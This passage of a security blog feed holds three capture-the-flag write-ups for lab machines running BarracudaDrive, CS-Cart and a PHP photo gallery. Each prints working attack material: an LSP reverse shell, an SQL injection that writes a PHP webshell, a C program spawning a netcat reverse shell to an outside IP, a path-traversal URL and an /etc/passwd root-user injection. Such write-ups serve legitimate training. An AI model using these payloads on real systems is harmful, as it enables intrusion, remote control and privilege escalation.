<p><img width="1417" height="722" alt="00nmap" src="https://github.com/user-attachments/assets/a9c42c67-02d5-4718-8a1d-bac49d5d2a02" /></p>

<h3 id="web-enumeration">Web Enumeration</h3>
<p>Visiting the website revealed <code>BarracudaDrive 6.5</code> was in use.</p>

<p><img width="1287" height="717" alt="01webvers" src="https://github.com/user-attachments/assets/b61d2687-0319-4e4d-92eb-dec468a05120" /></p>

<h3 id="exploitation">Exploitation</h3>
<p>It was a similar website like <code>FuguHub</code>. So at first I created admin user.</p>

<p><img width="1291" height="674" alt="02setadmin" src="https://github.com/user-attachments/assets/60b8bacc-8e54-46a2-8b11-cf3b742cb24c" /></p>

<p>Then from customize page, I updated about page to lsp reverse shell.</p>
<pre><code class="language-lsp">&lt;?lsp if request:method() == "GET" then ?&gt;
    &lt;?lsp 
        local host, port = "&lt;IP&gt;", &lt;PORT&gt;
        local socket = require("socket")
        local tcp = socket.tcp()
        local io = require("io")
        local connection, err = tcp:connect(host, port)
        
        if not connection then
            print("Error connecting: " .. err)
            return
        end
        
        while true do
            local cmd, status, partial = tcp:receive()
            if status == "closed" or status == "timeout" then break end
            if cmd then
                local f = io.popen(cmd, "r")
                local s = f:read("*a")
                f:close()
                tcp:send(s)
            end
        end
        
        tcp:close()
    ?&gt;
&lt;?lsp else ?&gt;
    Wrong request method, goodBye! 
&lt;?lsp end ?&gt;
</code></pre>

<p><img width="1290" height="869" alt="03customize" src="https://github.com/user-attachments/assets/3fe6ec59-a331-417a-b0f8-702ab297b154" /></p>

<p>Visiting the about page got me SYSTEM shell.</p>

<p><img width="1355" height="731" alt="04revshell" src="https://github.com/user-attachments/assets/b261d56d-d82e-4a9e-ab64-fec8a4669f90" /></p>

<p><img width="666" height="564" alt="05gg" src="https://github.com/user-attachments/assets/266d7dbb-c767-469a-8b25-8fb6279c6135" /></p>

<h2 id="2nd-way---intended-way">2nd way - Intended Way</h2>
<h3 id="enumeration">Enumeration</h3>
<p>Nmap also revealed two additional web ports were open.</p>

<p><img width="847" height="696" alt="00nmap2" src="https://github.com/user-attachments/assets/38a5bc1b-5497-4056-99d1-1eec2b45fdd7" /></p>

<p><img width="1103" height="163" alt="00nmap3" src="https://github.com/user-attachments/assets/d40d8f7d-dead-4a99-8f6a-1df8815b8931" /></p>

<p>Website at port 45332 was simple website that had no input points.</p>

<p><img width="1161" height="581" alt="01 0 quiz web" src="https://github.com/user-attachments/assets/879af4ea-f003-479e-a2bc-e30997ae1ea5" /></p>

<p>Directory brute force revealed <code>phpinfo.php</code> file.</p>

<p><img width="1020" height="656" alt="01 1 phpinfo dir" src="https://github.com/user-attachments/assets/73108926-b7fc-4639-b73d-f2cd5cbc3bb2" /></p>

<p>I noted down the <code>DOCUMENT_ROOT</code> variable.</p>

<p><img width="1169" height="603" alt="01 2 document root" src="https://github.com/user-attachments/assets/c3f7c9ae-a65d-4850-971c-fb09526c0b8b" /></p>

<p>Other website at 33033 redirected us to user page. One of the users had a different description.</p>

<p><img width="1288" height="799" alt="02sugoid" src="https://github.com/user-attachments/assets/87628036-daed-412f-9e8d-286ed3d40c6a" /></p>

<p>I could not login but there was a forgot password button. It required a reminder and I tried paranoid for the user and it worked. I logged in.</p>

<p><img width="1288" height="687" alt="03paranoid" src="https://github.com/user-attachments/assets/a1a13ae5-7bc3-4e48-a385-9d7c985d2d6a" /></p>

<p><img width="1290" height="761" alt="04loggedin" src="https://github.com/user-attachments/assets/cff0f51d-366a-43e4-9618-2327a9c06ad6" /></p>

<p>There was an experimental feature called request profile slug.</p>

<p><img width="1262" height="740" alt="05user slug" src="https://github.com/user-attachments/assets/660c40a1-2a33-47d4-8bad-b51ddd10b0d5" /></p>

<p>So I tested SQL injection there and it worked.</p>

<p><img width="1276" height="503" alt="06test" src="https://github.com/user-attachments/assets/dad8f9ef-e89e-4367-8e8e-51e7a910b32a" /></p>

<p><img width="1266" height="678" alt="07sqli" src="https://github.com/user-attachments/assets/27ed4ada-2c5e-47ff-a65f-34005279f06d" /></p>

<h3 id="exploitation-1">Exploitation</h3>
<p>So I used <code>INTO OUTFILE</code> query to put a webshell to DOCUMENT_ROOT.</p>
<pre><code class="language-sql">' UNION SELECT ("&lt;?php echo passthru($_GET['cmd']);") INTO OUTFILE 'C:/xampp/htdocs/cmd.php'  -- -'
</code></pre>

<p><img width="1139" height="541" alt="08put file" src="https://github.com/user-attachments/assets/da90bde8-536b-439d-9da9-35bc695c43d2" /></p>

<p>And I was able to execute commands.</p>

<p><img width="489" height="346" alt="09gg" src="https://github.com/user-attachments/assets/29ab12ae-3dc3-4a18-b0f7-b024586a5407" /></p>

<p>I transfered <code>nc64.exe</code> and executed it.</p>

<p><img width="1015" height="111" alt="10nc64" src="https://github.com/user-attachments/assets/3a748487-68cd-4e50-b89f-58f2faf67e17" /></p>

<p>Then simply got a reverse shell.</p>

<p><img width="734" height="649" alt="11local" src="https://github.com/user-attachments/assets/39884a53-dd9b-45ac-b74d-aa63ea11c825" /></p>

<h3 id="privilege-escalation">Privilege Escalation</h3>
<p>As we know <code>BarracudaDrive 6.5</code> was in use which was vulnerable to Insecure Folder Permissions.
I found an exploit description online (http<a href="https://www.exploit-db.com/exploits/48789">s://www.exploit-db.com/exploits/48789</a>).</p>

<p>All I had to do is replace <code>C:\bd\bd.exe</code> with a malicious file and execute <code>shutdown /r /t 0</code> to reboot.</p>

<p>So at first I created a malicious C file and compiled it with <code>i686-w64-mingw32-gcc</code>.</p>
<pre><code class="language-c">#include &lt;stdlib.h&gt;

int main(void){
     system("C:\\xampp\\htdocs\\nc64.exe 192.168.45.167 445 -e cmd.exe");
    return 0;
}
</code></pre>
<pre><code class="language-bash">i686-w64-mingw32-gcc exp.c -l ws2_32 -o bd.exe
</code></pre>

<p><img width="612" height="192" alt="13expc" src="https://github.com/user-attachments/assets/8c3f5821-829c-4f29-97d4-421e6c704665" /></p>

<p>Then I moved normal <code>bd.exe</code> to <code>bd.exe.bat</code> and transfered malicious file.</p>

<p><img width="674" height="596" alt="14changed" src="https://github.com/user-attachments/assets/788f0264-fa76-4f5c-8e44-847bbc042e55" /></p>

<p>Then set a nc reverse shell listener and rebooted the machine.</p>

<p><img width="254" height="51" alt="15reboot" src="https://github.com/user-attachments/assets/5caca9eb-fdf8-41a8-ba06-9c1967e4bd66" /></p>

<p>After some time, I got a SYSTEM shell.</p>

<p><img width="690" height="616" alt="16gg" src="https://github.com/user-attachments/assets/32350341-9f9f-41a7-a0c0-78fccc2eb41b" /></p>]]></content><author><name>Muhammet Talha Odabaşı</name></author><category term="Other" /><summary type="html"><![CDATA[1st Way - Directly SYSTEM Nmap Initial nmap scan revealed SMB, MySQL and HTTP 8000 ports were open.]]></summary></entry><entry><title type="html">PayDay - Proving Grounds Practice</title><link href="https://odabasi52.github.io/2026/03/18/pg-practice-payday.html" rel="alternate" type="text/html" title="PayDay - Proving Grounds Practice" /><published>2026-03-18T00:00:00+00:00</published><updated>2026-03-18T00:00:00+00:00</updated><id>https://odabasi52.github.io/2026/03/18/pg-practice-payday</id><content type="html" xml:base="https://odabasi52.github.io/2026/03/18/pg-practice-payday.html"><![CDATA[<h2 id="enumeration">Enumeration</h2>
<h3 id="nmap">Nmap</h3>
<p>Initial nmap scan revealed SSH, HTTP and some mail ports were open.</p>

<p><img width="871" height="320" alt="00nmap" src="https://github.com/user-attachments/assets/93c25ab4-7fad-4fe2-b161-6bf8c7f4a7c8" /></p>

<h3 id="web-enumeration">Web Enumeration</h3>
<p>Visiting the website revealed it was <code>CS-Cart</code> website.</p>

<p><img width="1293" height="836" alt="01web" src="https://github.com/user-attachments/assets/10dbe143-9d25-470a-8d32-0acf039baba9" /></p>

<p>Later, I searched how to find <code>CS-Cart</code> version and found this post (<a href="https://forum.cs-cart.com/t/how-to-find-my-cs-cart-version/13327">https://forum.cs-cart.com/t/how-to-find-my-cs-cart-version/13327</a>) 
which explains all you need to do is add <code>?version</code> to your website like this <code>http://test.com/?version</code>. So I did it and found out it was <code>CS-Cart 1.3.3</code>.</p>

<p><img width="1293" height="263" alt="02version" src="https://github.com/user-attachments/assets/1fc55bf0-9804-4c3b-a50a-56f94aec40d5" /></p>

<h2 id="exploitation">Exploitation</h2>
<h3 id="cs-cart-133-lfi">CS-Cart 1.3.3 LFI</h3>
<p>This version was vulnerable to LFI via below URL.</p>
<pre><code>http://&lt;IP&gt;/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00
</code></pre>

<p>So I simply searched it and found out there was a user named <code>patrick</code>.</p>

<p><img width="1294" height="305" alt="03LFI" src="https://github.com/user-attachments/assets/90063f53-49d0-481b-bc81-3454068cde68" /></p>

<h3 id="cs-cart-133-rce">CS-Cart 1.3.3 RCE</h3>
<p>This version was also vulnerable to malicious file upload leading to RCE. I found an exploit <a href="https://github.com/reatva/CS-Cart-1.3.3-RCE">reatva/CS-Cart-1.3.3-RCE</a>. It needed admin login so at first I tried to login admin page. 
I only used default <code>admin:admin</code> credentials and it worked.</p>

<p><img width="1290" height="836" alt="04admin" src="https://github.com/user-attachments/assets/3bd9471f-0957-4703-87df-401201ca2284" /></p>

<p><img width="1291" height="829" alt="05admin admin" src="https://github.com/user-attachments/assets/55f4230e-4623-495c-93ab-f8f43d67aaf3" /></p>

<p>Later, I simply executed the exploit and got reverse shell as <code>www-data</code>.</p>

<p><img width="808" height="116" alt="06exploit" src="https://github.com/user-attachments/assets/764e41df-3619-4108-b835-05be80ada3d2" /></p>

<p><img width="688" height="329" alt="07rev" src="https://github.com/user-attachments/assets/a88c57bc-4842-4eec-af1b-fcd3a07441a0" /></p>

<p>And I read the user flag.</p>

<p><img width="641" height="278" alt="08flag" src="https://github.com/user-attachments/assets/579c24d7-4821-42c7-80af-5ca684e0ea57" /></p>

<h2 id="privilege-escalation">Privilege Escalation</h2>
<h3 id="default-credentials-and-sudo-all">default credentials and sudo ALL</h3>
<p>Later, I tried many methods but non of them worked. This was an old system and I could not execute anything.</p>

<p>I then tried default credentials <code>patrick:patrick</code> and it worked. Moreover, calling <code>sudo -l</code> revealed I could run ALL commands as sudo. So I simply executed <code>sudo bash</code> and got root.</p>

<p><img width="713" height="596" alt="09root" src="https://github.com/user-attachments/assets/25ad0fae-765e-4f69-b294-f8839e972c56" /></p>]]></content><author><name>Muhammet Talha Odabaşı</name></author><category term="Other" /><summary type="html"><![CDATA[Enumeration Nmap Initial nmap scan revealed SSH, HTTP and some mail ports were open.]]></summary></entry><entry><title type="html">Snookums - Proving Grounds Practice</title><link href="https://odabasi52.github.io/2026/03/18/pg-practice-snookums.html" rel="alternate" type="text/html" title="Snookums - Proving Grounds Practice" /><published>2026-03-18T00:00:00+00:00</published><updated>2026-03-18T00:00:00+00:00</updated><id>https://odabasi52.github.io/2026/03/18/pg-practice-snookums</id><content type="html" xml:base="https://odabasi52.github.io/2026/03/18/pg-practice-snookums.html"><![CDATA[<h2 id="enumeration">Enumeration</h2>
<h3 id="nmap">Nmap</h3>
<p>Initial nmap scan revealed SSH and HTTP ports were open.</p>

<p><img width="819" height="306" alt="00nmap" src="https://github.com/user-attachments/assets/83b138b0-9539-4961-9e39-a00bcd08cb78" /></p>

<h3 id="web-enumeration">Web Enumeration</h3>
<p>Website was <code>Simple PHP Photo Gallery 0.8</code>.</p>

<p><img width="1006" height="596" alt="01web" src="https://github.com/user-attachments/assets/c48744ed-3fd4-4bdf-98c8-91b74c496c5d" /></p>

<p>I then searched for some exploits and found there was LFI and RFI vulnerabilities for version <code>0.7</code>. Nevertheless, I wanted to try it.</p>
<pre><code>site.com/image.php?img= [ PAYLOAD ]
</code></pre>

<p>At first I applied directory brute forcing to be sure there are <code>image.php</code> or other endpoints.</p>

<p><img width="1000" height="690" alt="02imagephp" src="https://github.com/user-attachments/assets/bedddc39-a437-409c-943d-482c605fa2ba" /></p>

<h2 id="exploitation">Exploitation</h2>
<h3 id="lfi-and-rfi">LFI and RFI</h3>
<p>Then I tried LFI and it worked. I saw there was a user named <code>michael</code>.</p>

<p><img width="1006" height="338" alt="03LFI" src="https://github.com/user-attachments/assets/76b7784e-fd8e-4007-875c-e848e726af3e" /></p>

<p>Then I tried RFI and it also worked.</p>

<p><img width="1384" height="756" alt="04RFI" src="https://github.com/user-attachments/assets/46c8fa44-83fc-4c45-b8b9-5f2c2677e6f9" /></p>

<p>So I downloaded <a href="https://github.com/pentestmonkey/php-reverse-shell">pentestmonkey/php-reverse-shell</a> and updated port and ip values. I also saved it as txt file.</p>

<p><img width="1483" height="390" alt="05updated" src="https://github.com/user-attachments/assets/a1aa6b04-6cd0-41df-b77d-dfd0909bdc87" /></p>

<p>Then I visited the website and got reverse shell.</p>

<p><img width="1215" height="689" alt="06revshell" src="https://github.com/user-attachments/assets/b576a53d-e9e2-43db-9918-763a5c39bff7" /></p>

<h3 id="dbphp">db.php</h3>
<p>There was a file named <code>db.php</code> under web root. I checked it and found mysql root password. And I logged in to mysql.</p>

<p><img width="892" height="574" alt="07mysql" src="https://github.com/user-attachments/assets/db492f0c-c630-43a5-b4d2-2d53e978254f" /></p>

<p>Then I enumerated usernames and found base64 encoded user passwords.</p>

<p><img width="710" height="660" alt="08db" src="https://github.com/user-attachments/assets/3a54f88e-88d8-4596-993b-a539285a8fdf" /></p>

<p>Then I decoded it and logged in to SSH as michael.</p>

<p><img width="1059" height="555" alt="09local" src="https://github.com/user-attachments/assets/15ce22da-bc76-4e02-bdaf-9be29c95bc11" /></p>

<h2 id="privilege-escalation">Privilege Escalation</h2>
<h3 id="writeable-passwd">writeable passwd</h3>
<p>I executed <code>linpeas.sh</code> and found that I could overwrite <code>/etc/passwd</code>.</p>

<p><img width="932" height="214" alt="10passwd" src="https://github.com/user-attachments/assets/45f657a0-11c3-4483-80fd-ee143c15278c" /></p>

<p>So I executed below command to add a user <code>r00t:password</code>. And I switched to that user and read root flag.</p>
<pre><code class="language-bash">pw=$(openssl passwd password); echo "r00t:${pw}:0:0:root:/root:/bin/bash" &gt;&gt; /etc/passwd
</code></pre>

<p><img width="903" height="461" alt="11flag" src="https://github.com/user-attachments/assets/5538fc24-b5ba-4eec-bcdb-f8a500bc82f0" /></p>]]></content><author><name>Muhammet Talha Odabaşı</name></author><category term="Other" /><summary type="html"><![CDATA[Enumeration Nmap Initial nmap scan revealed SSH and HTTP ports were open.]]></summary></entry></feed>